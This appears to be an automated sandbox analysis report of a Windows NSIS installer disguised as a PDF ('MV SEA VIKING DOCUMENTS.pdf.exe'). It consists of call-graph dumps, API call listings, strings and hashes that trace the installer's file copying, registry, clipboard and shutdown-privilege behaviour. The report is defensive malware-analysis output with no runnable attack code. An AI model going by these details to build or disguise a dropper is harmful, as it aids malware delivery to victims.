71491666 2 API calls 8633->8634 8635 71491663 8634->8635 8636 71491312 8635->8636 8637 7149131b GlobalAlloc lstrcpynW 8636->8637 8638 71491355 GlobalFree 8636->8638 8637->8638 8638->8542 8640 71491672 wsprintfW 8639->8640 8642 7149169f lstrcpyW 8639->8642 8644 714916b8 8640->8644 8642->8644 8644->8546 8646 71491931 8645->8646 8647 71492626 8645->8647 8646->8554 8646->8555 8647->8646 8648 71492642 GlobalFree 8647->8648 8648->8647 8650 71491312 2 API calls 8649->8650 8651 714915fe 8650->8651 8651->8557 8652->8561 8653->8586 8655 7149164d 8654->8655 8655->8588 8662 714912bb GlobalAlloc 8656->8662 8658 714912db lstrcpynW 8658->8577 8659->8592 8660->8583 8661->8585 8662->8658 8664 71491361 8663->8664 8665 714912cc 2 API calls 8664->8665 8666 7149137f 8665->8666 8666->8600 8668 71492808 8667->8668 8669 714927b2 VirtualAlloc 8667->8669 8668->8602 8669->8668 8671 71492b4d 8670->8671 8672 71492b5d 8671->8672 8673 71492b52 GetLastError 8671->8673 8672->8605 8673->8672 8674->8625 8676 7149138a 8675->8676 8677 714913ac 8675->8677 8676->8677 8678 71491390 lstrcpyW 8676->8678 8677->8625 8678->8677 8679->8633 8801 401ede 8802 402d84 17 API calls 8801->8802 8803 401ee4 8802->8803 8804 402d84 17 API calls 8803->8804 8805 401ef0 8804->8805 8806 401f07 EnableWindow 8805->8806 8807 401efc ShowWindow 8805->8807 8808 402c2a 8806->8808 8807->8808 8809 4056de 8810 405888 8809->8810 8811 4056ff GetDlgItem GetDlgItem GetDlgItem 8809->8811 8813 405891 GetDlgItem CreateThread CloseHandle 8810->8813 8814 4058b9 8810->8814 8855 4044ce SendMessageW 8811->8855 8813->8814 8858 405672 5 API calls 8813->8858 8816 4058e4 8814->8816 8817 4058d0 ShowWindow ShowWindow 8814->8817 8818 405909 8814->8818 8815 40576f 8821 405776 GetClientRect GetSystemMetrics SendMessageW SendMessageW 8815->8821 8819 4058f0 8816->8819 8820 405944 8816->8820 8857 4044ce SendMessageW 8817->8857 8825 404500 8 API calls 8818->8825 8823 4058f8 8819->8823 8824 40591e ShowWindow 8819->8824 8820->8818 8830 405952 SendMessageW 8820->8830 8828 4057e4 8821->8828 8829 4057c8 SendMessageW SendMessageW 8821->8829 8831 404472 SendMessageW 8823->8831 8826 405930 8824->8826 8827 40593e 8824->8827 8832 405917 8825->8832 8833 40559f 24 API calls 8826->8833 8834 404472 SendMessageW 8827->8834 8835 4057f7 8828->8835 8836 4057e9 SendMessageW 8828->8836 8829->8828 8830->8832 8837 40596b CreatePopupMenu 8830->8837 8831->8818 8833->8827 8834->8820 8839 404499 18 API calls 8835->8839 8836->8835 8838 40657a 17 API calls 8837->8838 8840 40597b AppendMenuW 8838->8840 8841 405807 8839->8841 8842 405998 GetWindowRect 8840->8842 8843 4059ab TrackPopupMenu 8840->8843 8844 405810 ShowWindow 8841->8844 8845 405844 GetDlgItem SendMessageW 8841->8845 8842->8843 8843->8832 8847 4059c6 8843->8847 8848 405833 8844->8848 8849 405826 ShowWindow 8844->8849 8845->8832 8846 40586b SendMessageW SendMessageW 8845->8846 8846->8832 8850 4059e2 SendMessageW 8847->8850 8856 4044ce SendMessageW 8848->8856 8849->8848 8850->8850 8852 4059ff OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 8850->8852 8853 405a24 SendMessageW 8852->8853 8853->8853 8854 405a4d GlobalUnlock SetClipboardData CloseClipboard 8853->8854 8854->8832 8855->8815 8856->8845 8857->8816 10359 401ff6 10360 402da6 17 API calls 10359->10360 10361 401ffd 10360->10361 10362 406873 2 API calls 10361->10362 10363 402003 10362->10363 10365 402014 10363->10365 10366 406484 wsprintfW 10363->10366 10366->10365 8148 2451880 EnumWindows 9230 40248a 9231 402da6 17 API calls 9230->9231 9232 40249c 9231->9232 9233 402da6 17 API calls 9232->9233 9234 4024a6 9233->9234 9247 402e36 9234->9247 9237 402c2a 9238 4024de 9239 4024ea 9238->9239 9241 402d84 17 API calls 9238->9241 9242 402509 RegSetValueExW 9239->9242 9244 4032b4 31 API calls 9239->9244 9240 402da6 17 API calls 9243 4024d4 lstrlenW 9240->9243 9241->9239 9245 40251f RegCloseKey 9242->9245 9243->9238 9244->9242 9245->9237 9248 402e51 9247->9248 9251 4063d8 9248->9251 9252 4063e7 9251->9252 9253 4063f2 RegCreateKeyExW 9252->9253 9254 4024b6 9252->9254 9253->9254 9254->9237 9254->9238 9254->9240 8438 245ae8a 8439 245aefc 8438->8439 8440 245b083 CreateFileA 8439->8440 8680 403f9a 8681 403fb2 8680->8681 8682 404113 8680->8682 8681->8682 8683 403fbe 8681->8683 8684 404164 8682->8684 8685 404124 GetDlgItem GetDlgItem 8682->8685 8686 403fc9 SetWindowPos 8683->8686 8687 403fdc 8683->8687 8689 4041be 8684->8689 8700 401389 2 API calls 8684->8700 8688 404499 18 API calls 8685->8688 8686->8687 8691 403fe5 ShowWindow 8687->8691 8692 404027 8687->8692 8693 40414e SetClassLongW 8688->8693 8690 4044e5 SendMessageW 8689->8690 8694 40410e 8689->8694 8721 4041d0 8690->8721 8695 404100 8691->8695 8696 404005 GetWindowLongW 8691->8696 8697 404046 8692->8697 8698 40402f DestroyWindow 8692->8698 8699 40140b 2 API calls 8693->8699 8762 404500 8695->8762 8696->8695 8703 40401e ShowWindow 8696->8703 8704 40404b SetWindowLongW 8697->8704 8705 40405c 8697->8705 8752 404422 8698->8752 8699->8684 8701 404196 8700->8701 8701->8689 8706 40419a SendMessageW 8701->8706 8703->8692 8704->8694 8705->8695 8709 404068 GetDlgItem 8705->8709 8706->8694 8707 40140b 2 API calls 8707->8721 8708 404424 DestroyWindow EndDialog 8708->8752 8711 404096 8709->8711 8712 404079 SendMessageW IsWindowEnabled 8709->8712 8710 404453 ShowWindow 8710->8694 8714 4040a3 8711->8714 8715 4040ea SendMessageW 8711->8715 8716 4040b6 8711->8716 8726 40409b 8711->8726 8712->8694 8712->8711 8713 40657a 17 API calls 8713->8721 8714->8715 8714->8726 8715->8695 8718 4040d3 8716->8718 8719 4040be 8716->8719 8723 40140b 2 API calls 8718->8723 8722 40140b 2 API calls 8719->8722 8720 4040d1 8720->8695 8721->8694 8721->8707 8721->8708 8721->8713 8724 404499 18 API calls 8721->8724 8743 404364 DestroyWindow 8721->8743 8753 404499 8721->8753 8722->8726 8725 4040da 8723->8725 8724->8721 8725->8695 8725->8726 8759 404472 8726->8759 8728 40424b GetDlgItem 8729 404260 8728->8729 8730 404268 ShowWindow KiUserCallbackDispatcher 8728->8730 8729->8730 8756 4044bb KiUserCallbackDispatcher 8730->8756 8732 404292 EnableWindow 8737 4042a6 8732->8737 8733 4042ab GetSystemMenu EnableMenuItem SendMessageW 8734 4042db SendMessageW 8733->8734 8733->8737 8734->8737 8736 403f7b 18 API calls 8736->8737 8737->8733 8737->8736 8757 4044ce SendMessageW 8737->8757 8758 40653d lstrcpynW 8737->8758 8739 40430a lstrlenW 8740 40657a 17 API calls 8739->8740 8741 404320 SetWindowTextW 8740->8741 8742 401389 2 API calls 8741->8742 8742->8721 8744 40437e CreateDialogParamW 8743->8744 8743->8752 8745 4043b1 8744->8745 8744->8752 8746 404499 18 API calls 8745->8746 8747 4043bc GetDlgItem GetWindowRect ScreenToClient SetWindowPos 8746->8747 8748 401389 2 API calls 8747->8748 8749 404402 8748->8749 8749->8694 8750 40440a ShowWindow 8749->8750 8751 4044e5 SendMessageW 8750->8751 8751->8752 8752->8694 8752->8710 8754 40657a 17 API calls 8753->8754 8755 4044a4 SetDlgItemTextW 8754->8755 8755->8728 8756->8732 8757->8737 8758->8739 8760 404479 8759->8760 8761 40447f SendMessageW 8759->8761 8760->8761 8761->8720 8763 4045c3 8762->8763 8764 404518 GetWindowLongW 8762->8764 8763->8694 8764->8763 8765 40452d 8764->8765 8765->8763 8766 40455a GetSysColor 8765->8766 8767 40455d 8765->8767 8766->8767 8768 404563 SetTextColor 8767->8768 8769 40456d SetBkMode 8767->8769 8768->8769 8770 404585 GetSysColor 8769->8770 8771 40458b 8769->8771 8770->8771 8772 404592 SetBkColor 8771->8772 8773 40459c 8771->8773 8772->8773 8773->8763 8774 4045b6 CreateBrushIndirect 8773->8774 8775 4045af DeleteObject 8773->8775 8774->8763 8775->8774 8782 40259e 8793 402de6 8782->8793 8786 4025b1 8787 4025d9 RegEnumValueW 8786->8787 8788 4025cd RegEnumKeyW 8786->8788 8789 40292e 8786->8789 8790 4025f5 RegCloseKey 8787->8790 8791 4025ee 8787->8791 8788->8790 8790->8789 8791->8790 8794 402da6 17 API calls 8793->8794 8795 402dfd 8794->8795 8796 4063aa RegOpenKeyExW 8795->8796 8797 4025a8 8796->8797 8798 402d84 8797->8798 8799 40657a 17 API calls 8798->8799 8800 402d99 8799->8800 8800->8786

                                                                                                                                                                                                                                Executed Functions

                                                                                                                                                                                                                                Function 0040352D Relevance: 89.7, APIs: 33, Strings: 18, Instructions: 450stringfilecomCOMMON
                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 0 40352d-40357d SetErrorMode GetVersionExW 1 4035b7-4035be 0->1 2 40357f-4035b3 GetVersionExW 0->2 3 4035c0 1->3 4 4035c8-403608 1->4 2->1 3->4 5 40360a-403612 call 40690a 4->5 6 40361b 4->6 5->6 12 403614 5->12 7 403620-403634 call 40689a lstrlenA 6->7 13 403636-403652 call 40690a * 3 7->13 12->6 20 403663-4036c5 #17 OleInitialize SHGetFileInfoW call 40653d GetCommandLineW call 40653d 13->20 21 403654-40365a 13->21 28 4036c7-4036c9 20->28 29 4036ce-4036e1 call 405e39 CharNextW 20->29 21->20 26 40365c 21->26 26->20 28->29 32 4037d8-4037de 29->32 33 4037e4 32->33 34 4036e6-4036ec 32->34 37 4037f8-403812 GetTempPathW call 4034fc 33->37 35 4036f5-4036fb 34->35 36 4036ee-4036f3 34->36 39 403702-403706 35->39 40 4036fd-403701 35->40 36->35 36->36 44 403814-403832 GetWindowsDirectoryW lstrcatW call 4034fc 37->44 45 40386a-403882 DeleteFileW call 40307d 37->45 42 4037c6-4037d4 call 405e39 39->42 43 40370c-403712 39->43 40->39 42->32 61 4037d6-4037d7 42->61 47 403714-40371b 43->47 48 40372c-403765 43->48 44->45 64 403834-403864 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 4034fc 44->64 66 403888-40388e 45->66 67 403a59-403a67 call 403b12 OleUninitialize 45->67 54 403722 47->54 55 40371d-403720 47->55 49 403781-4037bb 48->49 50 403767-40376c 48->50 58 4037c3-4037c5 49->58 59 4037bd-4037c1 49->59 50->49 56 40376e-403776 50->56 54->48 55->48 55->54 62 403778-40377b 56->62 63 40377d 56->63 58->42 59->58 65 4037e6-4037f3 call 40653d 59->65 61->32 62->49 62->63 63->49 64->45 64->67 65->37 71 403894-4038a7 call 405e39 66->71 72 403935-40393c call 403bec 66->72 79 403a69-403a78 call 405b9d ExitProcess 67->79 80 403a7e-403a84 67->80 81 4038f9-403906 71->81 82 4038a9-4038de 71->82 78 403941-403944 72->78 78->67 84 403a86-403a9b GetCurrentProcess OpenProcessToken 80->84 85 403afc-403b04 80->85 89 403908-403916 call 405f14 81->89 90 403949-40395d call 405b08 lstrcatW 81->90 86 4038e0-4038e4 82->86 92 403acc-403ada call 40690a 84->92 93 403a9d-403ac6 LookupPrivilegeValueW AdjustTokenPrivileges 84->93 87 403b06 85->87 88 403b09-403b0c ExitProcess 85->88 94 4038e6-4038eb 86->94 95 4038ed-4038f5 86->95 87->88 89->67 105 40391c-403932 call 40653d * 2 89->105 103 40396a-403984 lstrcatW lstrcmpiW 90->103 104 40395f-403965 lstrcatW 90->104 106 403ae8-403af3 ExitWindowsEx 92->106 107 403adc-403ae6 92->107 93->92 94->95 99 4038f7 94->99 95->86 95->99 99->81 109 403a57 103->109 110 40398a-40398d 103->110 104->103 105->72 106->85 108 403af5-403af7 call 40140b 106->108 107->106 107->108 108->85 109->67 114 403996 call 405aeb 110->114 115 40398f-403994 call 405a6e 110->115 121 40399b-4039ab SetCurrentDirectoryW 114->121 115->121 123 4039b8-4039e4 call 40653d 121->123 124 4039ad-4039b3 call 40653d 121->124 128 4039e9-403a04 call 40657a DeleteFileW 123->128 124->123 131 403a44-403a4e 128->131 132 403a06-403a16 CopyFileW 128->132 131->128 133 403a50-403a52 call 4062fd 131->133 132->131 134 403a18-403a38 call 4062fd call 40657a call 405b20 132->134 133->109 134->131 142 403a3a-403a41 CloseHandle 134->142 142->131
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • SetErrorMode.KERNELBASE(00008001), ref: 00403550
                                                                                                                                                                                                                                • GetVersionExW.KERNEL32(?), ref: 00403579
                                                                                                                                                                                                                                • GetVersionExW.KERNEL32(0000011C), ref: 00403590
                                                                                                                                                                                                                                • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403627
                                                                                                                                                                                                                                • #17.COMCTL32(00000007,00000009,0000000B), ref: 00403663
                                                                                                                                                                                                                                • OleInitialize.OLE32(00000000), ref: 0040366A
                                                                                                                                                                                                                                • SHGetFileInfoW.SHELL32(0042B228,00000000,?,000002B4,00000000), ref: 00403688
                                                                                                                                                                                                                                • GetCommandLineW.KERNEL32(00433F00,NSIS Error), ref: 0040369D
                                                                                                                                                                                                                                • CharNextW.USER32(00000000,"C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exe" ,00000020,"C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exe" ,00000000), ref: 004036D6
                                                                                                                                                                                                                                • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,?), ref: 00403809
                                                                                                                                                                                                                                • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 0040381A
                                                                                                                                                                                                                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403826
                                                                                                                                                                                                                                • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 0040383A
                                                                                                                                                                                                                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 00403842
                                                                                                                                                                                                                                • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 00403853
                                                                                                                                                                                                                                • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 0040385B
                                                                                                                                                                                                                                • DeleteFileW.KERNELBASE(1033), ref: 0040386F
                                                                                                                                                                                                                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu), ref: 00403956
                                                                                                                                                                                                                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A26C), ref: 00403965
                                                                                                                                                                                                                                  • Part of subcall function 00405AEB: CreateDirectoryW.KERNELBASE(?,00000000,00403520,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00405AF1
                                                                                                                                                                                                                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp), ref: 00403970
                                                                                                                                                                                                                                • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exe" ,00000000,?), ref: 0040397C
                                                                                                                                                                                                                                • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 0040399C
                                                                                                                                                                                                                                • DeleteFileW.KERNEL32(0042AA28,0042AA28,?,00436000,?), ref: 004039FB
                                                                                                                                                                                                                                • CopyFileW.KERNEL32(C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exe,0042AA28,00000001), ref: 00403A0E
                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,0042AA28,0042AA28,?,0042AA28,00000000), ref: 00403A3B
                                                                                                                                                                                                                                • OleUninitialize.OLE32(?), ref: 00403A5E
                                                                                                                                                                                                                                • ExitProcess.KERNEL32 ref: 00403A78
                                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(00000028,?), ref: 00403A8C
                                                                                                                                                                                                                                • OpenProcessToken.ADVAPI32(00000000), ref: 00403A93
                                                                                                                                                                                                                                • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403AA7
                                                                                                                                                                                                                                • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00403AC6
                                                                                                                                                                                                                                • ExitWindowsEx.USER32(00000002,80040002), ref: 00403AEB
                                                                                                                                                                                                                                • ExitProcess.KERNEL32 ref: 00403B0C
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2300564925.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300544038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300622526.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300650124.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300899095.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300959081.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301007520.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301071541.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301416769.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301518255.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2302104831.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: lstrcat$FileProcess$DirectoryExit$CurrentDeleteEnvironmentPathTempTokenVariableVersionWindows$AdjustCharCloseCommandCopyCreateErrorHandleInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesUninitializeValuelstrcmpilstrlen
                                                                                                                                                                                                                                • String ID: "C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exe" $.tmp$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\Stuffiness7.dat$C:\Users\user\Desktop$C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                                                                                                                                                                                                • API String ID: 3859024572-2330613956
                                                                                                                                                                                                                                • Opcode ID: e6a8171330b23895de066e2957319bca12562bbdb6a9eb3577c816747d85f5c1
                                                                                                                                                                                                                                • Instruction ID: 4d4dc0a58e4858e72561def8a0259f0227da8af974c10a5ea2b310ef4b80d7a5
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e6a8171330b23895de066e2957319bca12562bbdb6a9eb3577c816747d85f5c1
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 66E10670A00214AADB10AFB59D45BAF3AB8EF4470AF14847FF545B22D1DB7C8A41CB6D
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 004056DE Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 284windowclipboardmemoryCOMMON
                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 143 4056de-4056f9 144 405888-40588f 143->144 145 4056ff-4057c6 GetDlgItem * 3 call 4044ce call 404e27 GetClientRect GetSystemMetrics SendMessageW * 2 143->145 147 405891-4058b3 GetDlgItem CreateThread CloseHandle 144->147 148 4058b9-4058c6 144->148 165 4057e4-4057e7 145->165 166 4057c8-4057e2 SendMessageW * 2 145->166 147->148 150 4058e4-4058ee 148->150 151 4058c8-4058ce 148->151 155 4058f0-4058f6 150->155 156 405944-405948 150->156 153 4058d0-4058df ShowWindow * 2 call 4044ce 151->153 154 405909-405912 call 404500 151->154 153->150 169 405917-40591b 154->169 160 4058f8-405904 call 404472 155->160 161 40591e-40592e ShowWindow 155->161 156->154 158 40594a-405950 156->158 158->154 167 405952-405965 SendMessageW 158->167 160->154 163 405930-405939 call 40559f 161->163 164 40593e-40593f call 404472 161->164 163->164 164->156 172 4057f7-40580e call 404499 165->172 173 4057e9-4057f5 SendMessageW 165->173 166->165 174 405a67-405a69 167->174 175 40596b-405996 CreatePopupMenu call 40657a AppendMenuW 167->175 182 405810-405824 ShowWindow 172->182 183 405844-405865 GetDlgItem SendMessageW 172->183 173->172 174->169 180 405998-4059a8 GetWindowRect 175->180 181 4059ab-4059c0 TrackPopupMenu 175->181 180->181 181->174 185 4059c6-4059dd 181->185 186 405833 182->186 187 405826-405831 ShowWindow 182->187 183->174 184 40586b-405883 SendMessageW * 2 183->184 184->174 188 4059e2-4059fd SendMessageW 185->188 189 405839-40583f call 4044ce 186->189 187->189 188->188 191 4059ff-405a22 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 188->191 189->183 192 405a24-405a4b SendMessageW 191->192 192->192 193 405a4d-405a61 GlobalUnlock SetClipboardData CloseClipboard 192->193 193->174
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetDlgItem.USER32(?,00000403), ref: 0040573C
                                                                                                                                                                                                                                • GetDlgItem.USER32(?,000003EE), ref: 0040574B
                                                                                                                                                                                                                                • GetClientRect.USER32(?,?), ref: 00405788
                                                                                                                                                                                                                                • GetSystemMetrics.USER32(00000002), ref: 0040578F
                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001061,00000000,?), ref: 004057B0
                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004057C1
                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004057D4
                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004057E2
                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001024,00000000,?), ref: 004057F5
                                                                                                                                                                                                                                • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405817
                                                                                                                                                                                                                                • ShowWindow.USER32(?,00000008), ref: 0040582B
                                                                                                                                                                                                                                • GetDlgItem.USER32(?,000003EC), ref: 0040584C
                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040585C
                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405875
                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405881
                                                                                                                                                                                                                                • GetDlgItem.USER32(?,000003F8), ref: 0040575A
                                                                                                                                                                                                                                  • Part of subcall function 004044CE: SendMessageW.USER32(00000028,?,00000001,004042F9), ref: 004044DC
                                                                                                                                                                                                                                • GetDlgItem.USER32(?,000003EC), ref: 0040589E
                                                                                                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,Function_00005672,00000000), ref: 004058AC
                                                                                                                                                                                                                                • CloseHandle.KERNELBASE(00000000), ref: 004058B3
                                                                                                                                                                                                                                • ShowWindow.USER32(00000000), ref: 004058D7
                                                                                                                                                                                                                                • ShowWindow.USER32(?,00000008), ref: 004058DC
                                                                                                                                                                                                                                • ShowWindow.USER32(00000008), ref: 00405926
                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040595A
                                                                                                                                                                                                                                • CreatePopupMenu.USER32 ref: 0040596B
                                                                                                                                                                                                                                • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 0040597F
                                                                                                                                                                                                                                • GetWindowRect.USER32(?,?), ref: 0040599F
                                                                                                                                                                                                                                • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004059B8
                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001073,00000000,?), ref: 004059F0
                                                                                                                                                                                                                                • OpenClipboard.USER32(00000000), ref: 00405A00
                                                                                                                                                                                                                                • EmptyClipboard.USER32 ref: 00405A06
                                                                                                                                                                                                                                • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405A12
                                                                                                                                                                                                                                • GlobalLock.KERNEL32(00000000), ref: 00405A1C
                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405A30
                                                                                                                                                                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 00405A50
                                                                                                                                                                                                                                • SetClipboardData.USER32(0000000D,00000000), ref: 00405A5B
                                                                                                                                                                                                                                • CloseClipboard.USER32 ref: 00405A61
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2300564925.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300544038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300622526.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300650124.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300899095.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300959081.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301007520.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301071541.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301416769.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301518255.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2302104831.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                                                                                                                                                • String ID: {
                                                                                                                                                                                                                                • API String ID: 590372296-366298937
                                                                                                                                                                                                                                • Opcode ID: efbbf4d88f7660e4c87201c03f03245d3270aa31951a4a241d93bb0c475bbbe6
                                                                                                                                                                                                                                • Instruction ID: 6b97441d6f4cfe62a880681573964a63c423f2dd70b2063085686802d9cc5617
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: efbbf4d88f7660e4c87201c03f03245d3270aa31951a4a241d93bb0c475bbbe6
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C8B169B1900608FFDB119FA0DD85AAE7B79FB44355F00803AFA41BA1A0C7755E51DF58
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 00405C49 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 148filestringCOMMON
                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
